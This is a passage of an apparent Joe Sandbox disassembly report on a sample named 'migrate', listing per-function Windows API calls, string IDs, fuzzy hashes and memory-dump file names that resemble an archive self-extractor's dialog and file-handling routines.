                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44b9d826d7a8b8fa34e5ecff13b88d76405de0b76a53e90bb66fa70dd872a9db
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56416971900209AFCF16DF98CD81AEEBBB5FF48304F188099F919A7221D335EA50DB54
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00117406
                                                                                                                                                                                                      • Part of subcall function 00113BBA: __EH_prolog.LIBCMT ref: 00113BBF
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 001174CD
                                                                                                                                                                                                      • Part of subcall function 00117A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00117AAB
                                                                                                                                                                                                      • Part of subcall function 00117A9C: GetLastError.KERNEL32 ref: 00117AF1
                                                                                                                                                                                                      • Part of subcall function 00117A9C: CloseHandle.KERNEL32(?), ref: 00117B00
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                                                                                                                                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                                                                                                    • API String ID: 3813983858-639343689
                                                                                                                                                                                                    • Opcode ID: d27716b4439f520e130ceecd54796c278d3976c71fdcc41d53063891ea522782
                                                                                                                                                                                                    • Instruction ID: d9abe3af1c614b6e6b76b055068bfaf7d768e4a53952483f290c80198f8c9d29
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d27716b4439f520e130ceecd54796c278d3976c71fdcc41d53063891ea522782
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17310571D04258BADF16EBA4DC45BEEBBB9AF29300F044025F454A72D2D7748AC4C760
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00111316: GetDlgItem.USER32(00000000,00003021), ref: 0011135A
                                                                                                                                                                                                      • Part of subcall function 00111316: SetWindowTextW.USER32(00000000,001435F4), ref: 00111370
                                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0012AD98
                                                                                                                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0012ADAD
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0012ADC2
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                                                                                                                    • String ID: ASKNEXTVOL
                                                                                                                                                                                                    • API String ID: 445417207-3402441367
                                                                                                                                                                                                    • Opcode ID: c8894714138e51f93a98cb0fcc215e4cf6457cdc72e485fe4f376ec6425ffde4
                                                                                                                                                                                                    • Instruction ID: a66cc41dfc01669b91c317f4f01536b6664a3a4960e60e13e3e153b6eba694fd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8894714138e51f93a98cb0fcc215e4cf6457cdc72e485fe4f376ec6425ffde4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D11E932280224BFD7268FECFD05FAA7779FF5A742F800414F244D78A0C7619995A722
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __fprintf_l.LIBCMT ref: 0011D954
                                                                                                                                                                                                    • _strncpy.LIBCMT ref: 0011D99A
                                                                                                                                                                                                      • Part of subcall function 00121DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00151030,?,0011D928,00000000,?,00000050,00151030), ref: 00121DC4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: ByteCharMultiWide__fprintf_l_strncpy
• String ID: $%s$@%s
• API String ID: 562999700-834177443
• Opcode ID: 8ff140baa4cbc094dc15175770df1d01be86495db8283667c9347ed9aff32cca
• Instruction ID: dd0165f3f497c6996e0999fb3faf6944a3cb85e623c5e547f30075b728e7a466
• Opcode Fuzzy Hash: 8ff140baa4cbc094dc15175770df1d01be86495db8283667c9347ed9aff32cca
• Instruction Fuzzy Hash: 5721AF3244024CAEDF25EEA4DD05FEE7BE8AF15308F144122F910961A2E372D698CB52
APIs
• InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0011AC5A,00000008,?,00000000,?,0011D22D,?,00000000), ref: 00120E85
• CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0011AC5A,00000008,?,00000000,?,0011D22D,?,00000000), ref: 00120E8F
• CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0011AC5A,00000008,?,00000000,?,0011D22D,?,00000000), ref: 00120E9F
Strings
• Thread pool initialization failed., xrefs: 00120EB7
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: Create$CriticalEventInitializeSectionSemaphore
• String ID: Thread pool initialization failed.
• API String ID: 3340455307-2182114853
• Opcode ID: 24b2e151921787020e40fc026782ca6ba498d6a4b5457b55043d4c2f1a2ecaf1
• Instruction ID: c30d2b6c3a2fecbb967a98af56ba53ab1fac1551bf0bfcb6941332a51c59ddf3
• Opcode Fuzzy Hash: 24b2e151921787020e40fc026782ca6ba498d6a4b5457b55043d4c2f1a2ecaf1
• Instruction Fuzzy Hash: 711191B16047189FC3225F6AAC84AA7FBECEB69744F11492EF1DAC3201D7B159C08B60
APIs
  • Part of subcall function 00111316: GetDlgItem.USER32(00000000,00003021), ref: 0011135A
  • Part of subcall function 00111316: SetWindowTextW.USER32(00000000,001435F4), ref: 00111370
• EndDialog.USER32(?,00000001), ref: 0012B2BE
• GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0012B2D6
• SetDlgItemTextW.USER32(?,00000067,?), ref: 0012B304
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: ItemText$DialogWindow
• String ID: GETPASSWORD1
• API String ID: 445417207-3292211884
• Opcode ID: 88b82f51f7af6a7732bbc9b94e33b56d599d37827ee6d86198cd0546d11974ac
• Instruction ID: eaab6fe12a3c692acc2f91c4c8ac32bee0383fa10119206c79e18c11e31cd8c5
• Opcode Fuzzy Hash: 88b82f51f7af6a7732bbc9b94e33b56d599d37827ee6d86198cd0546d11974ac
• Instruction Fuzzy Hash: BF11C432904228B7DB259E64AD89FFF777CFF59710F000420FA45B34C0D7A1AAA597A1
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID:
• String ID: RENAMEDLG$REPLACEFILEDLG
• API String ID: 0-56093855
• Opcode ID: 2eca00f77147115ee1651225e22be14cabbf15a6785d4a12ba800f8450e4423e
• Instruction ID: 73fbd5fda4c89ec141019bcb3b091a3df1b25d96e8b70fed19c0b85449d8a25b
• Opcode Fuzzy Hash: 2eca00f77147115ee1651225e22be14cabbf15a6785d4a12ba800f8450e4423e
• Instruction Fuzzy Hash: DF019E3A604369EFC7118FA4FC44AAA3BA9F708355B000425F805A7AB0C73198E0EBE0
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: __alldvrm$_strrchr
• String ID:
• API String ID: 1036877536-0
• Opcode ID: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
• Instruction ID: 6090f84384a51ec1b5287897d5424e1b9d478dabb6bb4dfa6c76e5e424199b4c
• Opcode Fuzzy Hash: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
• Instruction Fuzzy Hash: A0A13972A043869FEB25CF68C891BBEFBE5EF65310F1841ADE4859B281C3B99D41C750
APIs
• CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00117F69,?,?,?), ref: 0011A3FA
• CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00117F69,?), ref: 0011A43E
• SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00117F69,?,?,?,?,?,?,?), ref: 0011A4BF
• CloseHandle.KERNEL32(?,?,?,00000800,?,00117F69,?,?,?,?,?,?,?,?,?,?), ref: 0011A4C6
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: File$Create$CloseHandleTime
• String ID:
• API String ID: 2287278272-0
• Opcode ID: 1736c7af12d2f9229f305abece14f0fc0b2f7e8776e398c730758d10cd1248d2
• Instruction ID: 6a21862c3200276e05554de25be80044ab588456f2f24c59a436dbbfc53080e7
• Opcode Fuzzy Hash: 1736c7af12d2f9229f305abece14f0fc0b2f7e8776e398c730758d10cd1248d2
• Instruction Fuzzy Hash: 9441E031249381AAD735DF24DC45FEEBBE4AF91300F48092DF6E093590D7A49A88DB53
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _wcslen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 176396367-0
                                                                                                                                                                                                    • Opcode ID: 191c025d14339238d0a548fa162e477baba50e9c9fc8351224282f999866cf80
                                                                                                                                                                                                    • Instruction ID: fb6411843cdea6d79bd135c95e504b6fc9aad7a712268dae17300cb9c01b1ce4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 191c025d14339238d0a548fa162e477baba50e9c9fc8351224282f999866cf80
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C341C571900669ABCB25DF68CC099EFBBB8EF15310F100129FD55F7241DB30AE958BA4
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,2DE85006,001347C6,00000000,00000000,001357FB,?,001357FB,?,00000001,001347C6,2DE85006,00000001,001357FB,001357FB), ref: 0013C9D5
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0013CA5E
                                                                                                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0013CA70
                                                                                                                                                                                                    • __freea.LIBCMT ref: 0013CA79
                                                                                                                                                                                                      • Part of subcall function 00138E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00134286,?,0000015D,?,?,?,?,00135762,000000FF,00000000,?,?), ref: 00138E38
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2652629310-0
                                                                                                                                                                                                    • Opcode ID: b3b48aed1214935f0e8bb0931bb964a6102a1f0943938f83ba5c6626ad17a0a8
                                                                                                                                                                                                    • Instruction ID: 2466f3864e22b76468f7c54e7fc15f33fee9303ca98114584b9cf6a1b7ffefa5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3b48aed1214935f0e8bb0931bb964a6102a1f0943938f83ba5c6626ad17a0a8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D31DE72A0021AABDF24CFA4DC41DAE7BA5EB01710F044228FC15E72A0EB35CD90CBE0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 0012A666
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0012A675
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0012A683
                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0012A691
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1035833867-0
                                                                                                                                                                                                    • Opcode ID: 875ccd52fc01d9436b54b32cb72b461c206e4bed36121b5dbdc14a86a3ac5cf9
                                                                                                                                                                                                    • Instruction ID: bbd0ab5b82a12b8787e94cf9c67df9ed7b50934dffe3c960c8b7a1ae01ff616b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 875ccd52fc01d9436b54b32cb72b461c206e4bed36121b5dbdc14a86a3ac5cf9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7E0EC31942722E7D6615B60BC0DB8A3E64AB06B53F010101FA19AA590DB6486C09BA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0012A699: GetDC.USER32(00000000), ref: 0012A69D
                                                                                                                                                                                                      • Part of subcall function 0012A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0012A6A8
                                                                                                                                                                                                      • Part of subcall function 0012A699: ReleaseDC.USER32(00000000,00000000), ref: 0012A6B3
                                                                                                                                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 0012A83C
                                                                                                                                                                                                      • Part of subcall function 0012AAC9: GetDC.USER32(00000000), ref: 0012AAD2
                                                                                                                                                                                                      • Part of subcall function 0012AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0012AB01
                                                                                                                                                                                                      • Part of subcall function 0012AAC9: ReleaseDC.USER32(00000000,?), ref: 0012AB99
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ObjectRelease$CapsDevice
                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                    • API String ID: 1061551593-3887548279
                                                                                                                                                                                                    • Opcode ID: bbe55977eda45c23e4278d7ee350d8f953a966065748cc5e0d8cc54a41ae5160
                                                                                                                                                                                                    • Instruction ID: 8d90a11080a9293165e23bfab3ea73b9bf8477becd206a8371866cc61a947b9c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bbe55977eda45c23e4278d7ee350d8f953a966065748cc5e0d8cc54a41ae5160
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4491EE75608354AFD611DF25D844E2BBBF9FF89700F00491EF99AD3260DB70A986CB62
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 001175E3
                                                                                                                                                                                                      • Part of subcall function 001205DA: _wcslen.LIBCMT ref: 001205E0
                                                                                                                                                                                                      • Part of subcall function 0011A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0011A598
                                                                                                                                                                                                    • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0011777F
                                                                                                                                                                                                      • Part of subcall function 0011A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0011A325,?,?,?,0011A175,?,00000001,00000000,?,?), ref: 0011A501
                                                                                                                                                                                                      • Part of subcall function 0011A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0011A325,?,?,?,0011A175,?,00000001,00000000,?,?), ref: 0011A532
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                                                                                                                                    • String ID: :
                                                                                                                                                                                                    • API String ID: 3226429890-336475711
                                                                                                                                                                                                    • Opcode ID: bdd832e8cc6ea2a1687ab621112ae327d7fb37e83e9d252e467a386b191c1001
                                                                                                                                                                                                    • Instruction ID: e1fe734ab6ddbeded68db91abe21a7d66b904fc42ba40ac07a6575a228bf90ea
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bdd832e8cc6ea2a1687ab621112ae327d7fb37e83e9d252e467a386b191c1001
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8419271805168A9EB29EB64DC59EEEB37DAF65300F0040A6B609A31D2DB745FC9CF70
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _wcslen
                                                                                                                                                                                                    • String ID: }
                                                                                                                                                                                                    • API String ID: 176396367-4239843852
                                                                                                                                                                                                    • Opcode ID: 6b055d92c4c9bf1011c4ff159c2e9d17db73c8d5608ffc51f1a6b464e82c3e92
                                                                                                                                                                                                    • Instruction ID: 93570be3828072d9e135b58bc362f760ec5a5a5ffe3d79116cff1fb5c512843c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b055d92c4c9bf1011c4ff159c2e9d17db73c8d5608ffc51f1a6b464e82c3e92
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 182108729093265AD731EB64F885F6FB3DCDF50760F04042AF640C7141E765DD6883A2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0011B9B8
                                                                                                                                                                                                      • Part of subcall function 00114092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001140A5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
